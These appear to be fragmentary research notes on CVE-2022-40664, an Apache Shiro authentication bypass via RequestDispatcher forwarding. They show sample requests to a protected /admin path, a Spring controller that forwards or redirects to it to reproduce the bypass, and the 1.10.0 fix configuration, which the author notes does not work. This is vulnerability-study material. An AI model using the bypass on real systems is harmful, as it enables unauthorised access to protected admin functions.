Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher.1
walkthrough2
GET /admin/auth_pass HTTP/1.1
GET /admin/auth HTTP/1.1
GET /admin/auth HTTP/1.1
Token: 4ra1n
exchange redirect from forward ?3
@RequestMapping("/admin/{value}")
public String CVE_2022_40664_bypass(@PathVariable String value, HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
System.out.println("=========== /admin" +((HttpServletRequest)request).getRequestURI()+ "/ ===========");
// request.getRequestDispatcher("/admin/auth").forward(request, response);
// return "forward:"+((HttpServletRequest)request).getRequestURI();
response.sendRedirect("/admin/auth");
return ("Redirect:/admin/auth");
}
forward4
request.getRequestDispatcher("/admin/auth").forward(request, response);
shiro 1.10.0
Define Bean5
@Bean
public MyShiroFilterFactoryBean filterRegBean(SecurityManager securityManager) throws Exception{
// CVE-2022-40664
// fixed conf
ShiroFilterConfiguration conf=new ShiroFilterConfiguration();
conf.setFilterOncePerRequest(false);
ShiroFilterFactoryBean shiroFilterFactoryBean=new ShiroFilterFactoryBean();
shiroFilterFactoryBean.setSecurityManager(securityManager);
shiroFilterFactoryBean.setShiroFilterConfiguration(conf);
AbstractShiroFilter filter=shiroFilterFactoryBean.getObject();
MyShiroFilterFactoryBean reg=new MyShiroFilterFactoryBean();
reg.setFilter(filter);
reg.addUrlPattern("/*");
reg.setName("shiroFilter");
reg.setSecurityManager(securityManager);
reg.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));
//fixed conf end.
return reg;
}
Do not work.